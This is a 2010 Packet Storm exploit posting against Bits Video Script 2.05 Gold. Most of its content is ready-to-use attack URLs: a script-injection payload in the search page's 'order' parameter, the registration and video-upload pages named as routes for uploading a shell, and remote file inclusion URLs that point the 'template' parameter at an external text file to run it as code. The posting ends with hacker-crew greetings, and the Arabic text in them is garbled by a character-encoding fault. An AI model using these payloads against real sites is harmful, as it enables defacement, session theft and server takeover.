Bits Video Script 2.05 Gold Version XSS / RFI / Shell Upload

2010-01-19T00:00:00
ID PACKETSTORM:85369
Type packetstorm
Reporter indoushka
Modified 2010-01-19T00:00:00

Description

                    
                      `========================================================================================  
| # Title : Bits Video Script 2.05 Gold Version Beta Multti Vulnerability  
| # Author : indoushka  
| # email : indoushka@hotmail.com  
| # Home : www.iq-ty.com/vb  
| # Script Home : http://www.ziddu.com/download/7885550/BitsVideoScript2.05GoldVersionBeta.rar.html  
| # Dork : i see him in my dream  
| # Tested on : windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)  
| # Bug : Mullti  
====================== Exploit By indoushka ================================= 
# Exploit :  
 
1- XSS 
 
http://127.0.0.1/Video/search.php?order=>'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> 
 
2- Shell Upload  
 
http://127.0.0.1/Video/register.php 
 
http://127.0.0.1/Video/addvideo.php 
 
3- RFI 
 
http://127.0.0.1/Video/showcasesearch.php?rowptem[template]=http://localhost/c.txt? 
 
http://127.0.0.1/Video/showcase2search.php?rowptem[template]=[EV!L] 
 
================================ Dz-Ghost Team ======================================================== 
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ 
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä 
Exploit-db Team (loneferret+Exploits+dookie2000ca) 
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org 
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org 
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team)  
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc  
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me  
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net 
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com  
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org  
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net  
------------------------------------------------------------------------------------------------------------ 
`